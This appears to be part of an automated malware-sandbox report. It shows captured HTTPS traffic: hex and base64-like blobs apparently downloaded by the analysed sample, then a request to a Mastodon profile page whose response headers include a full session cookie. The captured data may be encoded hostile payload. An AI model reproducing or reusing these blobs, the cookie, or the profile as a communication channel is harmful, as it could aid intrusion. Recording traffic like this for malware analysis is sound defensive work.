                                                                                                                                  2022-01-11 22:38:26 UTC252INData Raw: 00 66 00 5a 00 6c 00 4d 00 6f 00 76 00 63 00 70 00 56 00 46 00 46 00 4e 00 4a 00 50 00 4e 00 4e 00 30 00 36 00 6c 00 4f 00 35 00 68 00 31 00 76 00 4a 00 67 00 59 00 53 00 66 00 4b 00 6f 00 47 00 57 00 6d 00 56 00 59 00 78 00 70 00 54 00 68 00 79 00 6c 00 6f 00 73 00 69 00 37 00 39 00 48 00 68 00 76 00 61 00 45 00 34 00 36 00 39 00 33 00 58 00 66 00 2f 00 61 00 57 00 37 00 49 00 2f 00 67 00 71 00 47 00 41 00 63 00 6e 00 42 00 77 00 74 00 46 00 4b 00 51 00 36 00 7a 00 72 00 71 00 4e 00 65 00 58 00 77 00 4f 00 69 00 59 00 47 00 7a 00 47 00 73 00 65 00 73 00 43 00 36 00 74 00 42 00 38 00 72 00 56 00 5a 00 54 00 6b 00 43 00 58 00 58 00 47 00 36 00 7a 00 67 00 46 00 66 00 6a 00 31 00 7a 00 56 00 6f 00 47 00 68 00 50 00 70 00 65 00 6d 00 73 00 58 00 75 00 39 00
                                                                                                                                  Data Ascii: fZlMovcpVFFNJPNN06lO5h1vJgYSfKoGWmVYxpThylosi79HhvaE4693Xf/aW7I/gqGAcnBwtFKQ6zrqNeXwOiYGzGsesC6tB8rVZTkCXXG6zgFfj1zVoGhPpemsXu9
                                                                                                                                  2022-01-11 22:38:26 UTC268INData Raw: 00 62 00 72 00 52 00 31 00 65 00 45 00 41 00 4e 00 52 00 47 00 34 00 41 00 6d 00 48 00 4a 00 7a 00 61 00 78 00 44 00 64 00 35 00 45 00 49 00 4d 00 42 00 51 00 71 00 31 00 55 00 59 00 32 00 50 00 4d 00 64 00 57 00 78 00 46 00 45 00 67 00 50 00 6c 00 38 00 2f 00 78 00 56 00 33 00 58 00 39 00 4a 00 58 00 32 00 35 00 64 00 2f 00 4a 00 4f 00 4d 00 47 00 55 00 51 00 44 00 4b 00 2f 00 4a 00 47 00 36 00 46 00 4b 00 69 00 49 00 6f 00 62 00 54 00 75 00 68 00 43 00 43 00 54 00 50 00 6d 00 43 00 74 00 55 00 56 00 76 00 52 00 52 00 6b 00 33 00 2b 00 62 00 7a 00 4b 00 64 00 4a 00 6a 00 76 00 54 00 61 00 33 00 35 00 50 00 61 00 4a 00 69 00 31 00 35 00 69 00 44 00 6e 00 4b 00 62 00 62 00 4f 00 49 00 5a 00 35 00 51 00 44 00 6e 00 42 00 68 00 65 00 47 00 75 00 4f 00 6a 00
                                                                                                                                  Data Ascii: brR1eEANRG4AmHJzaxDd5EIMBQq1UY2PMdWxFEgPl8/xV3X9JX25d/JOMGUQDK/JG6FKiIobTuhCCTPmCtUVvRRk3+bzKdJjvTa35PaJi15iDnKbbOIZ5QDnBheGuOj
                                                                                                                                  2022-01-11 22:38:26 UTC284INData Raw: 00 46 00 39 00 6c 00 70 00 67 00 38 00 4e 00 72 00 4a 00 6b 00 6b 00 78 00 4e 00 4d 00 79 00 4c 00 56 00 69 00 4c 00 46 00 46 00 6c 00 78 00 6c 00 48 00 55 00 74 00 48 00 75 00 33 00 73 00 66 00 49 00 47 00 4a 00 4b 00 6f 00 67 00 51 00 4d 00 4e 00 43 00 2f 00 53 00 76 00 51 00 48 00 71 00 77 00 50 00 74 00 35 00 4b 00 51 00 4e 00 57 00 57 00 63 00 30 00 65 00 47 00 4b 00 37 00 2f 00 2b 00 5a 00 33 00 6d 00 62 00 77 00 30 00 65 00 55 00 2b 00 4e 00 62 00 70 00 7a 00 36 00 78 00 31 00 43 00 77 00 78 00 36 00 32 00 79 00 56 00 75 00 34 00 34 00 72 00 74 00 74 00 65 00 49 00 38 00 4f 00 46 00 39 00 73 00 65 00 35 00 4c 00 4c 00 72 00 6e 00 4b 00 63 00 72 00 4c 00 72 00 78 00 6a 00 38 00 45 00 52 00 4a 00 6a 00 75 00 30 00 43 00 30 00 45 00 4f 00 4d 00 66 00
                                                                                                                                  Data Ascii: F9lpg8NrJkkxNMyLViLFFlxlHUtHu3sfIGJKogQMNC/SvQHqwPt5KQNWWc0eGK7/+Z3mbw0eU+Nbpz6x1Cwx62yVu44rtteI8OF9se5LLrnKcrLrxj8ERJju0C0EOMf
                                                                                                                                  2022-01-11 22:38:26 UTC300INData Raw: 00 6c 00 6e 00 35 00 44 00 41 00 59 00 6c 00 4b 00 6d 00 35 00 45 00 49 00 6f 00 5a 00 48 00 49 00 65 00 42 00 42 00 77 00 51 00 46 00 49 00 45 00 2f 00 72 00 55 00 41 00 53 00 5a 00 62 00 69 00 37 00 6e 00 7a 00 6b 00 55 00 63 00 4a 00 67 00 2b 00 6c 00 45 00 71 00 4b 00 65 00 45 00 72 00 31 00 58 00 65 00 34 00 73 00 5a 00 4f 00 44 00 58 00 59 00 71 00 43 00 52 00 76 00 51 00 77 00 32 00 48 00 32 00 59 00 30 00 49 00 62 00 73 00 4a 00 74 00 56 00 31 00 7a 00 51 00 5a 00 6e 00 72 00 6c 00 75 00 53 00 5a 00 6c 00 67 00 50 00 55 00 73 00 44 00 4a 00 4a 00 62 00 58 00 68 00 4a 00 54 00 56 00 6e 00 4e 00 43 00 5a 00 65 00 4c 00 71 00 31 00 41 00 38 00 6c 00 79 00 4b 00 55 00 41 00 5a 00 4f 00 34 00 77 00 47 00 54 00 7a 00 6b 00 36 00 55 00 48 00 43 00 6e 00
                                                                                                                                  Data Ascii: ln5DAYlKm5EIoZHIeBBwQFIE/rUASZbi7nzkUcJg+lEqKeEr1Xe4sZODXYqCRvQw2H2Y0IbsJtV1zQZnrluSZlgPUsDJJbXhJTVnNCZeLq1A8lyKUAZO4wGTzk6UHCn
                                                                                                                                  2022-01-11 22:38:26 UTC316INData Raw: 00 39 00 68 00 2b 00 6e 00 78 00 33 00 4a 00 42 00 68 00 36 00 74 00 74 00 72 00 55 00 51 00 4c 00 33 00 46 00 4b 00 46 00 64 00 68 00 56 00 6d 00 4b 00 56 00 35 00 43 00 41 00 68 00 78 00 48 00 6a 00 43 00 61 00 35 00 79 00 77 00 49 00 42 00 75 00 6c 00 4e 00 7a 00 63 00 6b 00 4e 00 4d 00 76 00 70 00 51 00 79 00 31 00 37 00 6e 00 65 00 4d 00 64 00 35 00 48 00 6c 00 43 00 63 00 51 00 7a 00 4c 00 6c 00 4a 00 43 00 50 00 6e 00 73 00 71 00 79 00 53 00 45 00 41 00 65 00 2b 00 63 00 73 00 76 00 4c 00 38 00 69 00 4b 00 59 00 48 00 52 00 30 00 79 00 35 00 5a 00 35 00 43 00 30 00 52 00 6b 00 32 00 35 00 55 00 6d 00 73 00 69 00 41 00 73 00 66 00 4b 00 41 00 59 00 71 00 7a 00 63 00 79 00 50 00 75 00 4d 00 59 00 70 00 6c 00 75 00 59 00 74 00 68 00 4e 00 4c 00 44 00
                                                                                                                                  Data Ascii: 9h+nx3JBh6ttrUQL3FKFdhVmKV5CAhxHjCa5ywIBulNzckNMvpQy17neMd5HlCcQzLlJCPnsqySEAe+csvL8iKYHR0y5Z5C0Rk25UmsiAsfKAYqzcyPuMYpluYthNLD
                                                                                                                                  2022-01-11 22:38:26 UTC332INData Raw: 00 73 00 38 00 48 00 41 00 72 00 56 00 4d 00 56 00 34 00 5a 00 7a 00 6b 00 6e 00 54 00 75 00 36 00 6a 00 35 00 2f 00 45 00 6a 00 77 00 6b 00 69 00 30 00 78 00 43 00 4d 00 68 00 7a 00 31 00 62 00 48 00 76 00 44 00 41 00 4f 00 6d 00 41 00 53 00 64 00 4f 00 4b 00 73 00 55 00 59 00 4e 00 78 00 4c 00 33 00 4c 00 45 00 4e 00 61 00 45 00 79 00 49 00 34 00 61 00 50 00 44 00 56 00 43 00 34 00 6d 00 77 00 68 00 37 00 71 00 55 00 6a 00 6d 00 4a 00 49 00 54 00 43 00 4c 00 34 00 76 00 76 00 73 00 31 00 6e 00 59 00 7a 00 66 00 6b 00 32 00 50 00 55 00 74 00 2f 00 2b 00 72 00 71 00 68 00 79 00 31 00 47 00 79 00 4b 00 39 00 2b 00 50 00 43 00 55 00 55 00 79 00 46 00 45 00 53 00 42 00 61 00 48 00 74 00 2b 00 36 00 75 00 54 00 56 00 38 00 4d 00 44 00 67 00 37 00 69 00 34 00
                                                                                                                                  Data Ascii: s8HArVMV4ZzknTu6j5/Ejwki0xCMhz1bHvDAOmASdOKsUYNxL3LENaEyI4aPDVC4mwh7qUjmJITCL4vvs1nYzfk2PUt/+rqhy1GyK9+PCUUyFESBaHt+6uTV8MDg7i4
                                                                                                                                  2022-01-11 22:38:26 UTC348INData Raw: 00 51 00 50 00 2f 00 51 00 73 00 56 00 68 00 63 00 2f 00 53 00 47 00 49 00 6d 00 33 00 56 00 4a 00 59 00 70 00 66 00 64 00 47 00 61 00 48 00 62 00 6c 00 50 00 38 00 66 00 4a 00 70 00 6e 00 4c 00 61 00 65 00 75 00 68 00 46 00 78 00 31 00 4d 00 63 00 43 00 51 00 34 00 50 00 59 00 63 00 51 00 47 00 78 00 44 00 69 00 67 00 34 00 39 00 53 00 66 00 73 00 52 00 5a 00 4a 00 70 00 42 00 63 00 69 00 7a 00 52 00 37 00 51 00 2b 00 72 00 53 00 74 00 75 00 79 00 2f 00 4f 00 50 00 52 00 62 00 4c 00 76 00 54 00 77 00 52 00 6c 00 6d 00 4f 00 5a 00 68 00 69 00 32 00 41 00 56 00 6f 00 38 00 4b 00 72 00 36 00 4c 00 70 00 45 00 4b 00 54 00 39 00 6b 00 62 00 63 00 50 00 6b 00 4f 00 30 00 34 00 34 00 43 00 56 00 79 00 6b 00 39 00 4d 00 56 00 54 00 41 00 67 00 61 00 68 00 39 00
                                                                                                                                  Data Ascii: QP/QsVhc/SGIm3VJYpfdGaHblP8fJpnLaeuhFx1McCQ4PYcQGxDig49SfsRZJpBcizR7Q+rStuy/OPRbLvTwRlmOZhi2AVo8Kr6LpEKT9kbcPkO044CVyk9MVTAgah9
                                                                                                                                  2022-01-11 22:38:26 UTC364INData Raw: 00 76 00 6c 00 64 00 59 00 35 00 49 00 47 00 4e 00 54 00 52 00 75 00 54 00 6a 00 4c 00 47 00 52 00 43 00 7a 00 5a 00 37 00 54 00 4c 00 69 00 55 00 38 00 63 00 38 00 71 00 56 00 37 00 48 00 78 00 69 00 68 00 41 00 4b 00 55 00 57 00 41 00 64 00 74 00 4a 00 6d 00 47 00 4a 00 55 00 44 00 44 00 64 00 69 00 4b 00 6c 00 55 00 70 00 73 00 50 00 47 00 30 00 32 00 5a 00 76 00 69 00 32 00 75 00 78 00 2f 00 2f 00 7a 00 71 00 32 00 2f 00 68 00 2f 00 62 00 6b 00 58 00 2f 00 45 00 47 00 58 00 6a 00 74 00 4a 00 63 00 70 00 56 00 6d 00 44 00 2b 00 4d 00 57 00 45 00 52 00 44 00 77 00 31 00 33 00 67 00 68 00 43 00 46 00 49 00 51 00 48 00 4e 00 6a 00 4c 00 59 00 33 00 57 00 62 00 66 00 64 00 2f 00 6d 00 35 00 4b 00 51 00 35 00 4a 00 6f 00 39 00 43 00 70 00 63 00 62 00 67 00
                                                                                                                                  Data Ascii: vldY5IGNTRuTjLGRCzZ7TLiU8c8qV7HxihAKUWAdtJmGJUDDdiKlUpsPG02Zvi2ux//zq2/h/bkX/EGXjtJcpVmD+MWERDw13ghCFIQHNjLY3Wbfd/m5KQ5Jo9Cpcbg
                                                                                                                                  2022-01-11 22:38:26 UTC380INData Raw: 00 57 00 49 00 37 00 76 00 73 00 6f 00 4b 00 49 00 61 00 63 00 45 00 35 00 69 00 6a 00 63 00 77 00 47 00 46 00 68 00 75 00 7a 00 32 00 51 00 43 00 4f 00 6a 00 6c 00 39 00 6d 00 6b 00 31 00 42 00 37 00 4c 00 50 00 49 00 76 00 33 00 58 00 59 00 54 00 32 00 49 00 79 00 46 00 4b 00 49 00 70 00 73 00 78 00 6e 00 61 00 68 00 39 00 48 00 2b 00 79 00 62 00 72 00 43 00 46 00 79 00 62 00 72 00 46 00 61 00 53 00 72 00 6f 00 67 00 53 00 6d 00 66 00 62 00 64 00 38 00 35 00 6a 00 67 00 35 00 61 00 47 00 4e 00 50 00 32 00 6e 00 5a 00 7a 00 2f 00 48 00 39 00 4b 00 7a 00 4f 00 71 00 56 00 70 00 39 00 77 00 36 00 38 00 32 00 6a 00 42 00 77 00 76 00 52 00 36 00 58 00 41 00 4b 00 55 00 4d 00 34 00 31 00 46 00 37 00 41 00 44 00 5a 00 70 00 30 00 34 00 56 00 57 00 39 00 37 00
                                                                                                                                  Data Ascii: WI7vsoKIacE5ijcwGFhuz2QCOjl9mk1B7LPIv3XYT2IyFKIpsxnah9H+ybrCFybrFaSrogSmfbd85jg5aGNP2nZz/H9KzOqVp9w682jBwvR6XAKUM41F7ADZp04VW97
                                                                                                                                  2022-01-11 22:38:26 UTC396INData Raw: 00 77 00 50 00 31 00 6b 00 35 00 70 00 41 00 6c 00 54 00 70 00 6e 00 70 00 6c 00 64 00 35 00 76 00 73 00 72 00 34 00 36 00 70 00 58 00 68 00 64 00 6d 00 6b 00 30 00 73 00 2f 00 32 00 62 00 54 00 2f 00 65 00 4b 00 45 00 7a 00 2b 00 61 00 43 00 62 00 42 00 54 00 64 00 66 00 66 00 46 00 31 00 4f 00 46 00 6f 00 4d 00 4c 00 2b 00 70 00 45 00 77 00 57 00 6e 00 48 00 33 00 79 00 54 00 42 00 4f 00 36 00 4d 00 54 00 49 00 79 00 35 00 4d 00 30 00 59 00 65 00 45 00 42 00 6b 00 70 00 30 00 4b 00 66 00 55 00 53 00 5a 00 69 00 59 00 59 00 52 00 42 00 52 00 65 00 66 00 78 00 49 00 37 00 6e 00 4e 00 73 00 6c 00 2b 00 79 00 54 00 4e 00 4f 00 30 00 44 00 6e 00 6d 00 7a 00 48 00 72 00 51 00 34 00 4d 00 4b 00 59 00 5a 00 65 00 6e 00 33 00 6a 00 79 00 54 00 51 00 37 00 78 00
                                                                                                                                  Data Ascii: wP1k5pAlTpnpld5vsr46pXhdmk0s/2bT/eKEz+aCbBTdffF1OFoML+pEwWnH3yTBO6MTIy5M0YeEBkp0KfUSZiYYRBRefxI7nNsl+yTNO0DnmzHrQ4MKYZen3jyTQ7x
                                                                                                                                  2022-01-11 22:38:26 UTC412INData Raw: 00 35 00 73 00 37 00 62 00 52 00 73 00 32 00 30 00 5a 00 58 00 4a 00 50 00 64 00 39 00 69 00 51 00 33 00 45 00 51 00 5a 00 75 00 53 00 62 00 31 00 73 00 57 00 73 00 41 00 35 00 63 00 45 00 34 00 79 00 38 00 2f 00 69 00 69 00 65 00 76 00 36 00 4e 00 71 00 4f 00 53 00 6c 00 61 00 6e 00 75 00 4b 00 57 00 32 00 72 00 36 00 43 00 72 00 2f 00 2f 00 41 00 57 00 6d 00 69 00 34 00 76 00 61 00 55 00 73 00 73 00 47 00 38 00 52 00 4d 00 65 00 4f 00 68 00 52 00 52 00 68 00 4c 00 76 00 48 00 73 00 37 00 64 00 34 00 33 00 73 00 46 00 71 00 72 00 2b 00 6d 00 31 00 44 00 71 00 55 00 39 00 39 00 6c 00 57 00 76 00 47 00 41 00 73 00 34 00 35 00 31 00 61 00 46 00 71 00 65 00 6d 00 78 00 4c 00 51 00 54 00 35 00 75 00 4b 00 43 00 74 00 4d 00 6f 00 4a 00 74 00 6c 00 73 00 4e 00
                                                                                                                                  Data Ascii: 5s7bRs20ZXJPd9iQ3EQZuSb1sWsA5cE4y8/iiev6NqOSlanuKW2r6Cr//AWmi4vaUssG8RMeOhRRhLvHs7d43sFqr+m1DqU99lWvGAs451aFqemxLQT5uKCtMoJtlsN
                                                                                                                                  2022-01-11 22:38:26 UTC428INData Raw: 00 62 00 53 00 42 00 6c 00 2f 00 33 00 58 00 75 00 41 00 75 00 39 00 70 00 47 00 6a 00 49 00 50 00 57 00 54 00 78 00 37 00 70 00 51 00 2b 00 4c 00 68 00 6e 00 62 00 4e 00 4a 00 78 00 72 00 31 00 68 00 30 00 45 00 53 00 36 00 41 00 33 00 34 00 49 00 71 00 65 00 6c 00 50 00 61 00 35 00 44 00 44 00 52 00 76 00 39 00 61 00 49 00 74 00 38 00 6e 00 44 00 77 00 55 00 68 00 4b 00 62 00 44 00 41 00 2f 00 71 00 5a 00 63 00 58 00 50 00 43 00 73 00 2f 00 7a 00 54 00 39 00 45 00 61 00 4f 00 59 00 59 00 6d 00 73 00 41 00 4d 00 4f 00 4e 00 65 00 2f 00 7a 00 4f 00 76 00 30 00 41 00 4a 00 71 00 55 00 72 00 49 00 43 00 54 00 76 00 56 00 4a 00 6d 00 71 00 41 00 37 00 76 00 54 00 58 00 61 00 77 00 30 00 6a 00 77 00 68 00 75 00 36 00 56 00 65 00 6d 00 6d 00 57 00 48 00 49 00
                                                                                                                                  Data Ascii: bSBl/3XuAu9pGjIPWTx7pQ+LhnbNJxr1h0ES6A34IqelPa5DDRv9aIt8nDwUhKbDA/qZcXPCs/zT9EaOYYmsAMONe/zOv0AJqUrICTvVJmqA7vTXaw0jwhu6VemmWHI
                                                                                                                                  2022-01-11 22:38:26 UTC444INData Raw: 00 35 00 6f 00 75 00 2f 00 33 00 52 00 72 00 56 00 74 00 35 00 6e 00 79 00 31 00 31 00 58 00 70 00 5a 00 69 00 6e 00 4d 00 70 00 73 00 63 00 6d 00 51 00 37 00 35 00 45 00 35 00 4e 00 36 00 43 00 2b 00 66 00 4d 00 2f 00 55 00 33 00 41 00 36 00 41 00 4d 00 56 00 4c 00 62 00 4d 00 7a 00 4a 00 72 00 59 00 2f 00 6a 00 56 00 59 00 70 00 33 00 4d 00 38 00 4c 00 4e 00 54 00 6d 00 47 00 74 00 78 00 63 00 6a 00 44 00 42 00 75 00 39 00 63 00 38 00 58 00 4b 00 49 00 33 00 57 00 6c 00 67 00 73 00 79 00 4e 00 4b 00 42 00 76 00 63 00 45 00 57 00 33 00 49 00 68 00 69 00 54 00 6e 00 52 00 65 00 6c 00 78 00 48 00 6c 00 2f 00 58 00 79 00 4f 00 34 00 51 00 2b 00 36 00 68 00 39 00 39 00 7a 00 64 00 47 00 52 00 56 00 6b 00 55 00 48 00 32 00 67 00 75 00 36 00 37 00 6e 00 59 00
                                                                                                                                  Data Ascii: 5ou/3RrVt5ny11XpZinMpscmQ75E5N6C+fM/U3A6AMVLbMzJrY/jVYp3M8LNTmGtxcjDBu9c8XKI3WlgsyNKBvcEW3IhiTnRelxHl/XyO4Q+6h99zdGRVkUH2gu67nY
                                                                                                                                  2022-01-11 22:38:26 UTC460INData Raw: 00 58 00 46 00 46 00 39 00 5a 00 6b 00 50 00 65 00 45 00 66 00 50 00 31 00 34 00 2f 00 38 00 6e 00 63 00 44 00 78 00 42 00 70 00 6e 00 6f 00 41 00 6f 00 6c 00 79 00 70 00 43 00 59 00 38 00 33 00 77 00 46 00 41 00 35 00 6a 00 47 00 67 00 67 00 31 00 51 00 55 00 77 00 6c 00 37 00 59 00 6b 00 35 00 34 00 63 00 6b 00 75 00 78 00 64 00 78 00 55 00 54 00 75 00 49 00 75 00 62 00 65 00 4d 00 77 00 6b 00 68 00 66 00 52 00 63 00 73 00 6b 00 71 00 79 00 34 00 39 00 69 00 61 00 76 00 5a 00 77 00 39 00 7a 00 58 00 32 00 32 00 6a 00 68 00 79 00 65 00 78 00 4e 00 35 00 4e 00 65 00 54 00 6a 00 6d 00 57 00 73 00 6e 00 58 00 73 00 49 00 63 00 69 00 57 00 56 00 4a 00 6f 00 70 00 6f 00 44 00 39 00 6a 00 50 00 66 00 4d 00 4c 00 61 00 68 00 6d 00 48 00 54 00 42 00 30 00 69 00
                                                                                                                                  Data Ascii: XFF9ZkPeEfP14/8ncDxBpnoAolypCY83wFA5jGgg1QUwl7Yk54ckuxdxUTuIubeMwkhfRcskqy49iavZw9zX22jhyexN5NeTjmWsnXsIciWVJopoD9jPfMLahmHTB0i
                                                                                                                                  2022-01-11 22:38:26 UTC476INData Raw: 00 44 00 34 00 6a 00 52 00 48 00 44 00 73 00 69 00 77 00 69 00 31 00 6d 00 70 00 34 00 34 00 2f 00 64 00 53 00 45 00 45 00 77 00 32 00 78 00 31 00 71 00 5a 00 44 00 65 00 6b 00 6c 00 45 00 48 00 73 00 33 00 7a 00 4c 00 64 00 42 00 43 00 6a 00 4d 00 31 00 6f 00 69 00 7a 00 63 00 6a 00 53 00 57 00 2b 00 62 00 73 00 6b 00 75 00 39 00 6c 00 2f 00 64 00 46 00 45 00 34 00 55 00 71 00 63 00 4f 00 48 00 4c 00 75 00 4d 00 6d 00 71 00 47 00 53 00 44 00 32 00 31 00 64 00 43 00 45 00 72 00 47 00 63 00 69 00 32 00 74 00 54 00 46 00 6a 00 52 00 5a 00 31 00 61 00 4a 00 66 00 4f 00 63 00 52 00 51 00 34 00 65 00 71 00 30 00 65 00 6b 00 49 00 34 00 2b 00 2f 00 54 00 70 00 64 00 56 00 57 00 32 00 50 00 31 00 4c 00 65 00 41 00 5a 00 6b 00 32 00 42 00 4e 00 68 00 6d 00 6b 00
                                                                                                                                  Data Ascii: D4jRHDsiwi1mp44/dSEEw2x1qZDeklEHs3zLdBCjM1oizcjSW+bsku9l/dFE4UqcOHLuMmqGSD21dCErGci2tTFjRZ1aJfOcRQ4eq0ekI4+/TpdVW2P1LeAZk2BNhmk
                                                                                                                                  2022-01-11 22:38:26 UTC492INData Raw: 00 66 00 4c 00 6e 00 38 00 66 00 4e 00 64 00 78 00 52 00 64 00 67 00 38 00 67 00 48 00 4b 00 67 00 57 00 43 00 42 00 6b 00 69 00 77 00 62 00 31 00 4e 00 32 00 4d 00 65 00 73 00 75 00 4c 00 36 00 76 00 48 00 2b 00 35 00 4d 00 62 00 41 00 68 00 73 00 6d 00 51 00 6b 00 63 00 67 00 4c 00 30 00 49 00 42 00 2b 00 69 00 4d 00 67 00 66 00 4f 00 63 00 39 00 64 00 30 00 41 00 35 00 45 00 6f 00 44 00 73 00 6e 00 39 00 54 00 32 00 54 00 61 00 41 00 7a 00 77 00 73 00 68 00 4f 00 61 00 72 00 34 00 78 00 58 00 70 00 65 00 62 00 49 00 56 00 54 00 52 00 65 00 64 00 70 00 56 00 6b 00 2f 00 46 00 4a 00 41 00 59 00 35 00 58 00 54 00 30 00 2b 00 56 00 72 00 7a 00 4e 00 30 00 33 00 63 00 44 00 50 00 4d 00 61 00 63 00 71 00 64 00 55 00 54 00 77 00 36 00 39 00 4b 00 70 00 66 00
                                                                                                                                  Data Ascii: fLn8fNdxRdg8gHKgWCBkiwb1N2MesuL6vH+5MbAhsmQkcgL0IB+iMgfOc9d0A5EoDsn9T2TaAzwshOar4xXpebIVTRedpVk/FJAY5XT0+VrzN03cDPMacqdUTw69Kpf
                                                                                                                                  2022-01-11 22:38:26 UTC508INData Raw: 00 65 00 4a 00 4e 00 73 00 66 00 32 00 67 00 4a 00 42 00 32 00 69 00 73 00 6f 00 4b 00 74 00 6b 00 53 00 79 00 4a 00 53 00 6e 00 4f 00 64 00 35 00 58 00 50 00 47 00 58 00 54 00 57 00 4d 00 4a 00 2b 00 39 00 63 00 35 00 79 00 76 00 6d 00 74 00 47 00 69 00 4d 00 39 00 6c 00 76 00 39 00 4d 00 38 00 6f 00 33 00 62 00 4a 00 56 00 58 00 2b 00 4d 00 70 00 66 00 6f 00 54 00 33 00 65 00 65 00 49 00 5a 00 32 00 35 00 49 00 61 00 53 00 6b 00 78 00 32 00 46 00 55 00 2f 00 47 00 67 00 43 00 32 00 46 00 54 00 39 00 37 00 68 00 41 00 57 00 37 00 4a 00 6a 00 4f 00 66 00 5a 00 56 00 56 00 61 00 4e 00 6e 00 79 00 78 00 4c 00 37 00 64 00 54 00 47 00 65 00 50 00 52 00 68 00 42 00 37 00 76 00 51 00 4c 00 6b 00 72 00 47 00 7a 00 4b 00 64 00 34 00 55 00 49 00 54 00 34 00 42 00
                                                                                                                                  Data Ascii: eJNsf2gJB2isoKtkSyJSnOd5XPGXTWMJ+9c5yvmtGiM9lv9M8o3bJVX+MpfoT3eeIZ25IaSkx2FU/GgC2FT97hAW7JjOfZVVaNnyxL7dTGePRhB7vQLkrGzKd4UIT4B
                                                                                                                                  2022-01-11 22:38:26 UTC524INData Raw: 00 2b 00 2f 00 53 00 48 00 47 00 6c 00 4e 00 52 00 68 00 56 00 38 00 6c 00 78 00 55 00 64 00 70 00 6d 00 57 00 61 00 65 00 6e 00 2f 00 55 00 4c 00 52 00 4d 00 70 00 73 00 5a 00 4f 00 31 00 67 00 67 00 31 00 53 00 45 00 4d 00 75 00 4b 00 4d 00 50 00 6b 00 71 00 70 00 38 00 4a 00 4a 00 49 00 34 00 6b 00 6e 00 32 00 71 00 64 00 61 00 69 00 61 00 43 00 32 00 2b 00 51 00 58 00 68 00 41 00 52 00 66 00 61 00 47 00 72 00 7a 00 42 00 54 00 4b 00 63 00 35 00 65 00 37 00 41 00 46 00 63 00 33 00 78 00 52 00 48 00 41 00 34 00 31 00 63 00 31 00 6f 00 51 00 41 00 73 00 4c 00 71 00 79 00 72 00 57 00 5a 00 2b 00 78 00 76 00 75 00 49 00 55 00 71 00 61 00 42 00 6b 00 79 00 67 00 32 00 69 00 76 00 62 00 58 00 75 00 72 00 79 00 69 00 34 00 6f 00 44 00 7a 00 37 00 41 00 32 00
                                                                                                                                  Data Ascii: +/SHGlNRhV8lxUdpmWaen/ULRMpsZO1gg1SEMuKMPkqp8JJI4kn2qdaiaC2+QXhARfaGrzBTKc5e7AFc3xRHA41c1oQAsLqyrWZ+xvuIUqaBkyg2ivbXuryi4oDz7A2


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  10192.168.2.549906149.28.78.238443
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:39:17 UTC6776OUTGET /@banda5ker HTTP/1.1
                                                                                                                                  Host: noc.social
                                                                                                                                  2022-01-11 22:39:18 UTC6776INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:17 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Server: Mastodon
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Link: <https://noc.social/.well-known/webfinger?resource=acct%3Abanda5ker%40noc.social>; rel="lrdd"; type="application/jrd+json", <https://noc.social/users/banda5ker>; rel="alternate"; type="application/activity+json"
                                                                                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                                                                                  Cache-Control: max-age=0, public
                                                                                                                                  ETag: W/"d5899709a51d5189fcbcc99769b984f8"
                                                                                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://noc.social; img-src 'self' https: data: blob: https://noc.social; style-src 'self' https://noc.social; media-src 'self' https: data: https://noc.social; frame-src 'self' https:; manifest-src 'self' https://noc.social; connect-src 'self' data: blob: https://noc.social https://noc.social wss://noc.social; script-src 'self' https://noc.social; child-src 'self' blob: https://noc.social; worker-src 'self' blob: https://noc.social
                                                                                                                                  Set-Cookie: _mastodon_session=z0gGspTs%2Fwkll0f5EeZJIfTBDqjcn%2FRQAqEuiEsb6DForDKOZ1%2FLDrXdWrSlicEDSXrpUhxDqS7B3FW6Po5UkTZxb6qcVdxXepj%2ByyGdGI1w%2FQ0T2nMxgKBP27edldLbALMYkJGGkTXos7YRYURteszqfFCqG0wlVq7blqFbBA0Vv9PnjGOHgmRRyecPrz%2F8WlF%2BQXTKsk0hYEw%3D--Rhyun86dywLmKQwQ--eK44Ym6aJXW5uncPxIucJg%3D%3D; path=/; secure; HttpOnly
                                                                                                                                  X-Request-Id: a3177fe1-eb4f-4b71-9558-46d5acc3e4ef
                                                                                                                                  X-Runtime: 0.068265
                                                                                                                                  X-Cached: MISS
                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                  2022-01-11 22:39:18 UTC6777INData Raw: 33 63 36 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                                                                                  Data Ascii: 3c67<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
